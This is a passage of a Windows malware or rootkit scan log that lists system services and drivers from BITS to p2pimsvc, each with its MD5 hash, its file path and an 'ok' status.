14:26:36.0740 1440 [ 93952506C6D67330367F7E7934B6A02F ] BITS C:\Windows\System32\qmgr.dll
14:26:36.0767 1440 BITS - ok
14:26:36.0779 1440 blbdrive - ok
14:26:36.0839 1440 [ DB5BEA73EDAF19AC68B2C0FAD0F92B1A ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
14:26:36.0849 1440 Bonjour Service - ok
14:26:36.0889 1440 [ 35F376253F687BDE63976CCB3F2108CA ] bowser C:\Windows\system32\DRIVERS\bowser.sys
14:26:36.0925 1440 bowser - ok
14:26:36.0970 1440 [ 9F9ACC7F7CCDE8A15C282D3F88B43309 ] BrFiltLo C:\Windows\system32\drivers\brfiltlo.sys
14:26:36.0997 1440 BrFiltLo - ok
14:26:37.0057 1440 [ 56801AD62213A41F6497F96DEE83755A ] BrFiltUp C:\Windows\system32\drivers\brfiltup.sys
14:26:37.0057 1440 BrFiltUp - ok
14:26:37.0088 1440 [ A3629A0C4226F9E9C72FAAEEBC3AD33C ] Browser C:\Windows\System32\browser.dll
14:26:37.0104 1440 Browser - ok
14:26:37.0135 1440 [ B304E75CFF293029EDDF094246747113 ] Brserid C:\Windows\system32\drivers\brserid.sys
14:26:37.0166 1440 Brserid - ok
14:26:37.0182 1440 [ 203F0B1E73ADADBBB7B7B1FABD901F6B ] BrSerWdm C:\Windows\system32\drivers\brserwdm.sys
14:26:37.0197 1440 BrSerWdm - ok
14:26:37.0213 1440 [ BD456606156BA17E60A04E18016AE54B ] BrUsbMdm C:\Windows\system32\drivers\brusbmdm.sys
14:26:37.0228 1440 BrUsbMdm - ok
14:26:37.0254 1440 [ AF72ED54503F717A43268B3CC5FAEC2E ] BrUsbSer C:\Windows\system32\drivers\brusbser.sys
14:26:37.0274 1440 BrUsbSer - ok
14:26:37.0314 1440 [ 6D39C954799B63BA866910234CF7D726 ] BthEnum C:\Windows\system32\DRIVERS\BthEnum.sys
14:26:37.0334 1440 BthEnum - ok
14:26:37.0364 1440 [ AD07C1EC6665B8B35741AB91200C6B68 ] BTHMODEM C:\Windows\system32\drivers\bthmodem.sys
14:26:37.0394 1440 BTHMODEM - ok
14:26:37.0444 1440 [ 5904EFA25F829BF84EA6FB045134A1D8 ] BthPan C:\Windows\system32\DRIVERS\bthpan.sys
14:26:37.0464 1440 BthPan - ok
14:26:37.0524 1440 [ 611FF3F2F095C8D4A6D4CFD9DCC09793 ] BTHPORT C:\Windows\system32\Drivers\BTHport.sys
14:26:37.0564 1440 BTHPORT - ok
14:26:37.0594 1440 [ A4C8377FA4A994E07075107DBE2E3DCE ] BthServ C:\Windows\System32\bthserv.dll
14:26:37.0594 1440 BthServ - ok
14:26:37.0614 1440 [ D330803EAB2A15CAEC7F011F1D4CB30E ] BTHUSB C:\Windows\system32\Drivers\BTHUSB.sys
14:26:37.0634 1440 BTHUSB - ok
14:26:37.0674 1440 [ 7ADD03E75BEB9E6DD102C3081D29840A ] cdfs C:\Windows\system32\DRIVERS\cdfs.sys
14:26:37.0684 1440 cdfs - ok
14:26:37.0724 1440 [ 6B4BFFB9BECD728097024276430DB314 ] cdrom C:\Windows\system32\DRIVERS\cdrom.sys
14:26:37.0754 1440 cdrom - ok
14:26:37.0794 1440 [ 312EC3E37A0A1F2006534913E37B4423 ] CertPropSvc C:\Windows\System32\certprop.dll
14:26:37.0794 1440 CertPropSvc - ok
14:26:37.0814 1440 [ DA8E0AFC7BAA226C538EF53AC2F90897 ] circlass C:\Windows\system32\drivers\circlass.sys
14:26:37.0824 1440 circlass - ok
14:26:37.0874 1440 [ D7659D3B5B92C31E84E53C1431F35132 ] CLFS C:\Windows\system32\CLFS.sys
14:26:37.0904 1440 CLFS - ok
14:26:37.0954 1440 [ 8EE772032E2FE80A924F3B8DD5082194 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
14:26:37.0974 1440 clr_optimization_v2.0.50727_32 - ok
14:26:38.0044 1440 [ C5A75EB48E2344ABDC162BDA79E16841 ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
14:26:38.0064 1440 clr_optimization_v4.0.30319_32 - ok
14:26:38.0094 1440 [ 99AFC3795B58CC478FBBBCDC658FCB56 ] CmBatt C:\Windows\system32\DRIVERS\CmBatt.sys
14:26:38.0104 1440 CmBatt - ok
14:26:38.0134 1440 [ 45201046C776FFDAF3FC8A0029C581C8 ] cmdide C:\Windows\system32\drivers\cmdide.sys
14:26:38.0164 1440 cmdide - ok
14:26:38.0194 1440 [ 6AFEF0B60FA25DE07C0968983EE4F60A ] Compbatt C:\Windows\system32\DRIVERS\compbatt.sys
14:26:38.0214 1440 Compbatt - ok
14:26:38.0214 1440 COMSysApp - ok
14:26:38.0224 1440 [ 2A213AE086BBEC5E937553C7D9A2B22C ] crcdisk C:\Windows\system32\drivers\crcdisk.sys
14:26:38.0244 1440 crcdisk - ok
14:26:38.0274 1440 [ 22A7F883508176489F559EE745B5BF5D ] Crusoe C:\Windows\system32\drivers\crusoe.sys
14:26:38.0274 1440 Crusoe - ok
14:26:38.0304 1440 [ F1E8C34892336D33EDDCDFE44E474F64 ] CryptSvc C:\Windows\system32\cryptsvc.dll
14:26:38.0314 1440 CryptSvc - ok
14:26:38.0354 1440 [ 3B5B4D53FEC14F7476CA29A20CC31AC9 ] DcomLaunch C:\Windows\system32\rpcss.dll
14:26:38.0364 1440 DcomLaunch - ok
14:26:38.0394 1440 [ 622C41A07CA7E6DD91770F50D532CB6C ] DfsC C:\Windows\system32\Drivers\dfsc.sys
14:26:38.0414 1440 DfsC - ok
14:26:38.0504 1440 [ 2CC3DCFB533A1035B13DCAB6160AB38B ] DFSR C:\Windows\system32\DFSR.exe
14:26:38.0574 1440 DFSR - ok
14:26:38.0644 1440 [ 9028559C132146FB75EB7ACF384B086A ] Dhcp C:\Windows\System32\dhcpcsvc.dll
14:26:38.0644 1440 Dhcp - ok
14:26:38.0674 1440 [ 5D4AEFC3386920236A548271F8F1AF6A ] disk C:\Windows\system32\drivers\disk.sys
14:26:38.0694 1440 disk - ok
14:26:38.0744 1440 [ 57D762F6F5974AF0DA2BE88A3349BAAA ] Dnscache C:\Windows\System32\dnsrslvr.dll
14:26:38.0744 1440 Dnscache - ok
14:26:38.0774 1440 [ 324FD74686B1EF5E7C19A8AF49E748F6 ] dot3svc C:\Windows\System32\dot3svc.dll
14:26:38.0794 1440 dot3svc - ok
14:26:38.0844 1440 [ A622E888F8AA2F6B49E9BC466F0E5DEF ] DPS C:\Windows\system32\dps.dll
14:26:38.0844 1440 DPS - ok
14:26:38.0874 1440 [ 97FEF831AB90BEE128C9AF390E243F80 ] drmkaud C:\Windows\system32\drivers\drmkaud.sys
14:26:38.0894 1440 drmkaud - ok
14:26:38.0924 1440 [ C68AC676B0EF30CFBB1080ADCE49EB1F ] DXGKrnl C:\Windows\System32\drivers\dxgkrnl.sys
14:26:38.0934 1440 DXGKrnl - ok
14:26:38.0954 1440 [ F88FB26547FD2CE6D0A5AF2985892C48 ] E1G60 C:\Windows\system32\DRIVERS\E1G60I32.sys
14:26:38.0984 1440 E1G60 - ok
14:26:39.0004 1440 [ C0B95E40D85CD807D614E264248A45B9 ] EapHost C:\Windows\System32\eapsvc.dll
14:26:39.0004 1440 EapHost - ok
14:26:39.0044 1440 [ 7F64EA048DCFAC7ACF8B4D7B4E6FE371 ] Ecache C:\Windows\system32\drivers\ecache.sys
14:26:39.0074 1440 Ecache - ok
14:26:39.0104 1440 [ E8F3F21A71720C84BCF423B80028359F ] elxstor C:\Windows\system32\drivers\elxstor.sys
14:26:39.0134 1440 elxstor - ok
14:26:39.0184 1440 [ 4E6B23DFC917EA39306B529B773950F4 ] EMDMgmt C:\Windows\system32\emdmgmt.dll
14:26:39.0194 1440 EMDMgmt - ok
14:26:39.0224 1440 [ 67058C46504BC12D821F38CF99B7B28F ] EventSystem C:\Windows\system32\es.dll
14:26:39.0234 1440 EventSystem - ok
14:26:39.0284 1440 [ 22B408651F9123527BCEE54B4F6C5CAE ] exfat C:\Windows\system32\drivers\exfat.sys
14:26:39.0284 1440 exfat - ok
14:26:39.0314 1440 [ 1E9B9A70D332103C52995E957DC09EF8 ] fastfat C:\Windows\system32\drivers\fastfat.sys
14:26:39.0344 1440 fastfat - ok
14:26:39.0384 1440 [ 63BDADA84951B9C03E641800E176898A ] fdc C:\Windows\system32\DRIVERS\fdc.sys
14:26:39.0394 1440 fdc - ok
14:26:39.0424 1440 [ 6629B5F0E98151F4AFDD87567EA32BA3 ] fdPHost C:\Windows\system32\fdPHost.dll
14:26:39.0454 1440 fdPHost - ok
14:26:39.0474 1440 [ 89ED56DCE8E47AF40892778A5BD31FD2 ] FDResPub C:\Windows\system32\fdrespub.dll
14:26:39.0474 1440 FDResPub - ok
14:26:39.0504 1440 [ A8C0139A884861E3AAE9CFE73B208A9F ] FileInfo C:\Windows\system32\drivers\fileinfo.sys
14:26:39.0554 1440 FileInfo - ok
14:26:39.0585 1440 [ 0AE429A696AECBC5970E3CF2C62635AE ] Filetrace C:\Windows\system32\drivers\filetrace.sys
14:26:39.0601 1440 Filetrace - ok
14:26:39.0648 1440 [ 6603957EFF5EC62D25075EA8AC27DE68 ] flpydisk C:\Windows\system32\DRIVERS\flpydisk.sys
14:26:39.0663 1440 flpydisk - ok
14:26:39.0704 1440 [ 01334F9EA68E6877C4EF05D3EA8ABB05 ] FltMgr C:\Windows\system32\drivers\fltmgr.sys
14:26:39.0734 1440 FltMgr - ok
14:26:39.0804 1440 [ 8CE364388C8ECA59B14B539179276D44 ] FontCache C:\Windows\system32\FntCache.dll
14:26:39.0814 1440 FontCache - ok
14:26:39.0864 1440 [ C7FBDD1ED42F82BFA35167A5C9803EA3 ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
14:26:39.0894 1440 FontCache3.0.0.0 - ok
14:26:39.0924 1440 [ B972A66758577E0BFD1DE0F91AAA27B5 ] Fs_Rec C:\Windows\system32\drivers\Fs_Rec.sys
14:26:39.0954 1440 Fs_Rec - ok
14:26:39.0984 1440 [ 4E1CD0A45C50A8882616CAE5BF82F3C5 ] gagp30kx C:\Windows\system32\drivers\gagp30kx.sys
14:26:40.0004 1440 gagp30kx - ok
14:26:40.0064 1440 [ 8182FF89C65E4D38B2DE4BB0FB18564E ] GEARAspiWDM C:\Windows\system32\DRIVERS\GEARAspiWDM.sys
14:26:40.0094 1440 GEARAspiWDM - ok
14:26:40.0144 1440 [ CD5D0AEEE35DFD4E986A5AA1500A6E66 ] gpsvc C:\Windows\System32\gpsvc.dll
14:26:40.0154 1440 gpsvc - ok
14:26:40.0184 1440 [ 88A78635B41ED4B261365FADEB28FE81 ] HBtnKey C:\Windows\system32\DRIVERS\cpqbttn.sys
14:26:40.0234 1440 HBtnKey - ok
14:26:40.0274 1440 [ CB04C744BE0A61B1D648FAED182C3B59 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
14:26:40.0284 1440 HdAudAddService - ok
14:26:40.0324 1440 [ 062452B7FFD68C8C042A6261FE8DFF4A ] HDAudBus C:\Windows\system32\DRIVERS\HDAudBus.sys
14:26:40.0324 1440 HDAudBus - ok
14:26:40.0364 1440 [ 1338520E78D90154ED6BE8F84DE5FCEB ] HidBth C:\Windows\system32\drivers\hidbth.sys
14:26:40.0384 1440 HidBth - ok
14:26:40.0414 1440 [ FF3160C3A2445128C5A6D9B076DA519E ] HidIr C:\Windows\system32\drivers\hidir.sys
14:26:40.0434 1440 HidIr - ok
14:26:40.0474 1440 [ 84067081F3318162797385E11A8F0582 ] hidserv C:\Windows\system32\hidserv.dll
14:26:40.0474 1440 hidserv - ok
14:26:40.0484 1440 [ CCA4B519B17E23A00B826C55716809CC ] HidUsb C:\Windows\system32\DRIVERS\hidusb.sys
14:26:40.0504 1440 HidUsb - ok
14:26:40.0534 1440 [ D8AD255B37DA92434C26E4876DB7D418 ] hkmsvc C:\Windows\system32\kmsvc.dll
14:26:40.0534 1440 hkmsvc - ok
14:26:40.0554 1440 [ DF353B401001246853763C4B7AAA6F50 ] HpCISSs C:\Windows\system32\drivers\hpcisss.sys
14:26:40.0584 1440 HpCISSs - ok
14:26:40.0624 1440 [ 64637B65C90DF48C94BB9346AFB3AC61 ] hpdskflt C:\Windows\system32\DRIVERS\hpdskflt.sys
14:26:40.0654 1440 hpdskflt - ok
14:26:40.0734 1440 [ FDF273A845F1FFCCEADF363AAF47582F ] hpqwmiex C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
14:26:40.0734 1440 hpqwmiex - ok
14:26:40.0764 1440 [ DB8CF923DFD8DD336BEA7F439A627858 ] hpsrv C:\Windows\system32\Hpservice.exe
14:26:40.0764 1440 hpsrv - ok
14:26:40.0794 1440 [ 0EEECA26C8D4BDE2A4664DB058A81937 ] HTTP C:\Windows\system32\drivers\HTTP.sys
14:26:40.0824 1440 HTTP - ok
14:26:40.0864 1440 [ 1720966D9C7EA5E2D78B6DB92D2F9171 ] hwdatacard C:\Windows\system32\DRIVERS\ewusbmdm.sys
14:26:40.0904 1440 hwdatacard - ok
14:26:40.0934 1440 [ 324C2152FF2C61ABAE92D09F3CCA4D63 ] i2omp C:\Windows\system32\drivers\i2omp.sys
14:26:40.0954 1440 i2omp - ok
14:26:41.0004 1440 [ 22D56C8184586B7A1F6FA60BE5F5A2BD ] i8042prt C:\Windows\system32\DRIVERS\i8042prt.sys
14:26:41.0014 1440 i8042prt - ok
14:26:41.0044 1440 [ C957BF4B5D80B46C5017BF0101E6C906 ] iaStorV C:\Windows\system32\drivers\iastorv.sys
14:26:41.0074 1440 iaStorV - ok
14:26:41.0154 1440 [ 98477B08E61945F974ED9FDC4CB6BDAB ] idsvc C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
14:26:41.0214 1440 idsvc - ok
14:26:41.0304 1440 [ 0391268713612372E4E0ECEAADAD41D5 ] igfx C:\Windows\system32\DRIVERS\igdkmd32.sys
14:26:41.0384 1440 igfx - ok
14:26:41.0414 1440 [ 2D077BF86E843F901D8DB709C95B49A5 ] iirsp C:\Windows\system32\drivers\iirsp.sys
14:26:41.0444 1440 iirsp - ok
14:26:41.0494 1440 [ 9908D8A397B76CD8D31D0D383C5773C9 ] IKEEXT C:\Windows\System32\ikeext.dll
14:26:41.0494 1440 IKEEXT - ok
14:26:41.0514 1440 [ 97469037714070E45194ED318D636401 ] intelide C:\Windows\system32\drivers\intelide.sys
14:26:41.0544 1440 intelide - ok
14:26:41.0584 1440 [ 224191001E78C89DFA78924C3EA595FF ] intelppm C:\Windows\system32\DRIVERS\intelppm.sys
14:26:41.0584 1440 intelppm - ok
14:26:41.0624 1440 [ 9AC218C6E6105477484C6FDBE7D409A4 ] IPBusEnum C:\Windows\system32\ipbusenum.dll
14:26:41.0644 1440 IPBusEnum - ok
14:26:41.0684 1440 [ 62C265C38769B864CB25B4BCF62DF6C3 ] IpFilterDriver C:\Windows\system32\DRIVERS\ipfltdrv.sys
14:26:41.0694 1440 IpFilterDriver - ok
14:26:41.0714 1440 [ 1998BD97F950680BB55F55A7244679C2 ] iphlpsvc C:\Windows\System32\iphlpsvc.dll
14:26:41.0714 1440 iphlpsvc - ok
14:26:41.0724 1440 IpInIp - ok
14:26:41.0764 1440 [ 40F34F8ABA2A015D780E4B09138B6C17 ] IPMIDRV C:\Windows\system32\drivers\ipmidrv.sys
14:26:41.0764 1440 IPMIDRV - ok
14:26:41.0784 1440 [ 8793643A67B42CEC66490B2A0CF92D68 ] IPNAT C:\Windows\system32\DRIVERS\ipnat.sys
14:26:41.0814 1440 IPNAT - ok
14:26:41.0884 1440 [ E6BE7A41A28D8F2DB174957454D32448 ] iPod Service C:\Program Files\iPod\bin\iPodService.exe
14:26:41.0894 1440 iPod Service - ok
14:26:41.0914 1440 [ 109C0DFB82C3632FBD11949B73AEEAC9 ] IRENUM C:\Windows\system32\drivers\irenum.sys
14:26:41.0944 1440 IRENUM - ok
14:26:41.0957 1440 [ 350FCA7E73CF65BCEF43FAE1E4E91293 ] isapnp C:\Windows\system32\drivers\isapnp.sys
14:26:41.0980 1440 isapnp - ok
14:26:42.0012 1440 [ 232FA340531D940AAC623B121A595034 ] iScsiPrt C:\Windows\system32\DRIVERS\msiscsi.sys
14:26:42.0013 1440 iScsiPrt - ok
14:26:42.0031 1440 [ BCED60D16156E428F8DF8CF27B0DF150 ] iteatapi C:\Windows\system32\drivers\iteatapi.sys
14:26:42.0038 1440 iteatapi - ok
14:26:42.0063 1440 [ 06FA654504A498C30ADCA8BEC4E87E7E ] iteraid C:\Windows\system32\drivers\iteraid.sys
14:26:42.0082 1440 iteraid - ok
14:26:42.0119 1440 [ 37605E0A8CF00CBBA538E753E4344C6E ] kbdclass C:\Windows\system32\DRIVERS\kbdclass.sys
14:26:42.0141 1440 kbdclass - ok
14:26:42.0171 1440 [ EDE59EC70E25C24581ADD1FBEC7325F7 ] kbdhid C:\Windows\system32\DRIVERS\kbdhid.sys
14:26:42.0188 1440 kbdhid - ok
14:26:42.0216 1440 [ A3E186B4B935905B829219502557314E ] KeyIso C:\Windows\system32\lsass.exe
14:26:42.0217 1440 KeyIso - ok
14:26:42.0258 1440 [ 4A1445EFA932A3BAF5BDB02D7131EE20 ] KSecDD C:\Windows\system32\Drivers\ksecdd.sys
14:26:42.0298 1440 KSecDD - ok
14:26:42.0339 1440 [ 8078F8F8F7A79E2E6B494523A828C585 ] KtmRm C:\Windows\system32\msdtckrm.dll
14:26:42.0345 1440 KtmRm - ok
14:26:42.0371 1440 [ 1BF5EEBFD518DD7298434D8C862F825D ] LanmanServer C:\Windows\system32\srvsvc.dll
14:26:42.0375 1440 LanmanServer - ok
14:26:42.0419 1440 [ 1DB69705B695B987082C8BAEC0C6B34F ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
14:26:42.0423 1440 LanmanWorkstation - ok
14:26:42.0448 1440 [ D1C5883087A0C3F1344D9D55A44901F6 ] lltdio C:\Windows\system32\DRIVERS\lltdio.sys
14:26:42.0476 1440 lltdio - ok
14:26:42.0513 1440 [ 2D5A428872F1442631D0959A34ABFF63 ] lltdsvc C:\Windows\System32\lltdsvc.dll
14:26:42.0539 1440 lltdsvc - ok
14:26:42.0574 1440 [ 35D40113E4A5B961B6CE5C5857702518 ] lmhosts C:\Windows\System32\lmhsvc.dll
14:26:42.0576 1440 lmhosts - ok
14:26:42.0610 1440 [ A2262FB9F28935E862B4DB46438C80D2 ] LSI_FC C:\Windows\system32\drivers\lsi_fc.sys
14:26:42.0640 1440 LSI_FC - ok
14:26:42.0649 1440 [ 30D73327D390F72A62F32C103DAF1D6D ] LSI_SAS C:\Windows\system32\drivers\lsi_sas.sys
14:26:42.0682 1440 LSI_SAS - ok
14:26:42.0715 1440 [ E1E36FEFD45849A95F1AB81DE0159FE3 ] LSI_SCSI C:\Windows\system32\drivers\lsi_scsi.sys
14:26:42.0753 1440 LSI_SCSI - ok
14:26:42.0798 1440 [ 23B55D27A0AFB7FE9CBCB20B617CC168 ] Ltn_stk7070P C:\Windows\system32\DRIVERS\Ltn_stk7070P.sys
14:26:42.0837 1440 Ltn_stk7070P - ok
14:26:42.0866 1440 [ 1FA7503D019291C027FEDAE509BC5500 ] Ltn_stkrc C:\Windows\system32\DRIVERS\Ltn_stkrc.sys
14:26:42.0894 1440 Ltn_stkrc - ok
14:26:42.0915 1440 [ 8F5C7426567798E62A3B3614965D62CC ] luafv C:\Windows\system32\drivers\luafv.sys
14:26:42.0917 1440 luafv - ok
14:26:42.0958 1440 [ D153B14FC6598EAE8422A2037553ADCE ] megasas C:\Windows\system32\drivers\megasas.sys
14:26:42.0989 1440 megasas - ok
14:26:43.0011 1440 [ 1076FFCFFAAE8385FD62DFCB25AC4708 ] MMCSS C:\Windows\system32\mmcss.dll
14:26:43.0015 1440 MMCSS - ok
14:26:43.0045 1440 [ E13B5EA0F51BA5B1512EC671393D09BA ] Modem C:\Windows\system32\drivers\modem.sys
14:26:43.0046 1440 Modem - ok
14:26:43.0078 1440 [ 0A9BB33B56E294F686ABB7C1E4E2D8A8 ] monitor C:\Windows\system32\DRIVERS\monitor.sys
14:26:43.0080 1440 monitor - ok
14:26:43.0094 1440 [ 5BF6A1326A335C5298477754A506D263 ] mouclass C:\Windows\system32\DRIVERS\mouclass.sys
14:26:43.0137 1440 mouclass - ok
14:26:43.0170 1440 [ 93B8D4869E12CFBE663915502900876F ] mouhid C:\Windows\system32\DRIVERS\mouhid.sys
14:26:43.0198 1440 mouhid - ok
14:26:43.0230 1440 [ BDAFC88AA6B92F7842416EA6A48E1600 ] MountMgr C:\Windows\system32\drivers\mountmgr.sys
14:26:43.0258 1440 MountMgr - ok
14:26:43.0327 1440 [ 51A84B690DF519DCF656F780243D953E ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
14:26:43.0356 1440 MozillaMaintenance - ok
14:26:43.0404 1440 [ 583A41F26278D9E0EA548163D6139397 ] mpio C:\Windows\system32\drivers\mpio.sys
14:26:43.0441 1440 mpio - ok
14:26:43.0482 1440 [ 22241FEBA9B2DEFA669C8CB0A8DD7D2E ] mpsdrv C:\Windows\system32\drivers\mpsdrv.sys
14:26:43.0513 1440 mpsdrv - ok
14:26:43.0554 1440 [ 5DE62C6E9108F14F6794060A9BDECAEC ] MpsSvc C:\Windows\system32\mpssvc.dll
14:26:43.0563 1440 MpsSvc - ok
14:26:43.0580 1440 [ 4FBBB70D30FD20EC51F80061703B001E ] Mraid35x C:\Windows\system32\drivers\mraid35x.sys
14:26:43.0611 1440 Mraid35x - ok
14:26:43.0640 1440 [ 82CEA0395524AACFEB58BA1448E8325C ] MRxDAV C:\Windows\system32\drivers\mrxdav.sys
14:26:43.0679 1440 MRxDAV - ok
14:26:43.0707 1440 [ 1E94971C4B446AB2290DEB71D01CF0C2 ] mrxsmb C:\Windows\system32\DRIVERS\mrxsmb.sys
14:26:43.0739 1440 mrxsmb - ok
14:26:43.0764 1440 [ 4FCCB34D793B116423209C0F8B7A3B03 ] mrxsmb10 C:\Windows\system32\DRIVERS\mrxsmb10.sys
14:26:43.0820 1440 mrxsmb10 - ok
14:26:43.0820 1440 [ C3CB1B40AD4A0124D617A1199B0B9D7C ] mrxsmb20 C:\Windows\system32\DRIVERS\mrxsmb20.sys
14:26:43.0835 1440 mrxsmb20 - ok
14:26:43.0882 1440 [ 5457DCFA7C0DA43522F4D9D4049C1472 ] msahci C:\Windows\system32\drivers\msahci.sys
14:26:43.0898 1440 msahci - ok
14:26:43.0944 1440 [ 3FC82A2AE4CC149165A94699183D3028 ] msdsm C:\Windows\system32\drivers\msdsm.sys
14:26:43.0964 1440 msdsm - ok
14:26:44.0004 1440 [ FD7520CC3A80C5FC8C48852BB24C6DED ] MSDTC C:\Windows\System32\msdtc.exe
14:26:44.0044 1440 MSDTC - ok
14:26:44.0104 1440 [ A9927F4A46B816C92F461ACB90CF8515 ] Msfs C:\Windows\system32\drivers\Msfs.sys
14:26:44.0124 1440 Msfs - ok
14:26:44.0154 1440 [ 0F400E306F385C56317357D6DEA56F62 ] msisadrv C:\Windows\system32\drivers\msisadrv.sys
14:26:44.0164 1440 msisadrv - ok
14:26:44.0184 1440 [ 85466C0757A23D9A9AECDC0755203CB2 ] MSiSCSI C:\Windows\system32\iscsiexe.dll
14:26:44.0224 1440 MSiSCSI - ok
14:26:44.0224 1440 msiserver - ok
14:26:44.0264 1440 [ D8C63D34D9C9E56C059E24EC7185CC07 ] MSKSSRV C:\Windows\system32\drivers\MSKSSRV.sys
14:26:44.0264 1440 MSKSSRV - ok
14:26:44.0284 1440 [ 1D373C90D62DDB641D50E55B9E78D65E ] MSPCLOCK C:\Windows\system32\drivers\MSPCLOCK.sys
14:26:44.0294 1440 MSPCLOCK - ok
14:26:44.0304 1440 [ B572DA05BF4E098D4BBA3A4734FB505B ] MSPQM C:\Windows\system32\drivers\MSPQM.sys
14:26:44.0324 1440 MSPQM - ok
14:26:44.0374 1440 [ B49456D70555DE905C311BCDA6EC6ADB ] MsRPC C:\Windows\system32\drivers\MsRPC.sys
14:26:44.0414 1440 MsRPC - ok
14:26:44.0444 1440 [ E384487CB84BE41D09711C30CA79646C ] mssmbios C:\Windows\system32\DRIVERS\mssmbios.sys
14:26:44.0444 1440 mssmbios - ok
14:26:44.0454 1440 [ 7199C1EEC1E4993CAF96B8C0A26BD58A ] MSTEE C:\Windows\system32\drivers\MSTEE.sys
14:26:44.0474 1440 MSTEE - ok
14:26:44.0494 1440 [ 6A57B5733D4CB702C8EA4542E836B96C ] Mup C:\Windows\system32\Drivers\mup.sys
14:26:44.0534 1440 Mup - ok
14:26:44.0564 1440 [ E4EAF0C5C1B41B5C83386CF212CA9584 ] napagent C:\Windows\system32\qagentRT.dll
14:26:44.0574 1440 napagent - ok
14:26:44.0614 1440 [ 85C44FDFF9CF7E72A40DCB7EC06A4416 ] NativeWifiP C:\Windows\system32\DRIVERS\nwifi.sys
14:26:44.0624 1440 NativeWifiP - ok
14:26:44.0674 1440 [ 1357274D1883F68300AEADD15D7BBB42 ] NDIS C:\Windows\system32\drivers\ndis.sys
14:26:44.0684 1440 NDIS - ok
14:26:44.0704 1440 [ 0E186E90404980569FB449BA7519AE61 ] NdisTapi C:\Windows\system32\DRIVERS\ndistapi.sys
14:26:44.0724 1440 NdisTapi - ok
14:26:44.0754 1440 [ D6973AA34C4D5D76C0430B181C3CD389 ] Ndisuio C:\Windows\system32\DRIVERS\ndisuio.sys
14:26:44.0774 1440 Ndisuio - ok
14:26:44.0794 1440 [ 818F648618AE34F729FDB47EC68345C3 ] NdisWan C:\Windows\system32\DRIVERS\ndiswan.sys
14:26:44.0824 1440 NdisWan - ok
14:26:44.0864 1440 [ 71DAB552B41936358F3B541AE5997FB3 ] NDProxy C:\Windows\system32\drivers\NDProxy.sys
14:26:44.0884 1440 NDProxy - ok
14:26:44.0914 1440 [ BCD093A5A6777CF626434568DC7DBA78 ] NetBIOS C:\Windows\system32\DRIVERS\netbios.sys
14:26:44.0934 1440 NetBIOS - ok
14:26:44.0964 1440 [ ECD64230A59CBD93C85F1CD1CAB9F3F6 ] netbt C:\Windows\system32\DRIVERS\netbt.sys
14:26:44.0968 1440 netbt - ok
14:26:44.0982 1440 [ A3E186B4B935905B829219502557314E ] Netlogon C:\Windows\system32\lsass.exe
14:26:44.0985 1440 Netlogon - ok
14:26:45.0018 1440 [ C8052711DAECC48B982434C5116CA401 ] Netman C:\Windows\System32\netman.dll
14:26:45.0023 1440 Netman - ok
14:26:45.0039 1440 [ 2EF3BBE22E5A5ACD1428EE387A0D0172 ] netprofm C:\Windows\System32\netprofm.dll
14:26:45.0043 1440 netprofm - ok
14:26:45.0081 1440 [ D6C4E4A39A36029AC0813D476FBD0248 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
14:26:45.0094 1440 NetTcpPortSharing - ok
14:26:45.0204 1440 [ 8DE67BD902095A13329FD82C85A1FA09 ] NETw5v32 C:\Windows\system32\DRIVERS\NETw5v32.sys
14:26:45.0346 1440 NETw5v32 - ok
14:26:45.0372 1440 [ 2E7FB731D4790A1BC6270ACCEFACB36E ] nfrd960 C:\Windows\system32\drivers\nfrd960.sys
14:26:45.0398 1440 nfrd960 - ok
14:26:45.0438 1440 [ 2997B15415F9BBE05B5A4C1C85E0C6A2 ] NlaSvc C:\Windows\System32\nlasvc.dll
14:26:45.0442 1440 NlaSvc - ok
14:26:45.0468 1440 [ D36F239D7CCE1931598E8FB90A0DBC26 ] Npfs C:\Windows\system32\drivers\Npfs.sys
14:26:45.0494 1440 Npfs - ok
14:26:45.0522 1440 [ 8BB86F0C7EEA2BDED6FE095D0B4CA9BD ] nsi C:\Windows\system32\nsisvc.dll
14:26:45.0525 1440 nsi - ok
14:26:45.0548 1440 [ 609773E344A97410CE4EBF74A8914FCF ] nsiproxy C:\Windows\system32\drivers\nsiproxy.sys
14:26:45.0575 1440 nsiproxy - ok
14:26:45.0641 1440 [ 6A4A98CEE84CF9E99564510DDA4BAA47 ] Ntfs C:\Windows\system32\drivers\Ntfs.sys
14:26:45.0683 1440 Ntfs - ok
14:26:45.0717 1440 [ E875C093AEC0C978A90F30C9E0DFBB72 ] ntrigdigi C:\Windows\system32\drivers\ntrigdigi.sys
14:26:45.0738 1440 ntrigdigi - ok
14:26:45.0770 1440 [ C5DBBCDA07D780BDA9B685DF333BB41E ] Null C:\Windows\system32\drivers\Null.sys
14:26:45.0794 1440 Null - ok
14:26:45.0819 1440 [ E69E946F80C1C31C53003BFBF50CBB7C ] nvraid C:\Windows\system32\drivers\nvraid.sys
14:26:45.0842 1440 nvraid - ok
14:26:45.0882 1440 [ 9E0BA19A28C498A6D323D065DB76DFFC ] nvstor C:\Windows\system32\drivers\nvstor.sys
14:26:45.0890 1440 nvstor - ok
14:26:45.0929 1440 [ 07C186427EB8FCC3D8D7927187F260F7 ] nv_agp C:\Windows\system32\drivers\nv_agp.sys
14:26:45.0949 1440 nv_agp - ok
14:26:45.0956 1440 NwlnkFlt - ok
14:26:45.0964 1440 NwlnkFwd - ok
14:26:46.0001 1440 [ BE32DA025A0BE1878F0EE8D6D9386CD5 ] ohci1394 C:\Windows\system32\drivers\ohci1394.sys
14:26:46.0030 1440 ohci1394 - ok
14:26:46.0077 1440 [ 0C8E8E61AD1EB0B250B846712C917506 ] p2pimsvc C:\Windows\system32\p2psvc.dll
14:26:46.0118 1440 p2pimsvc - ok
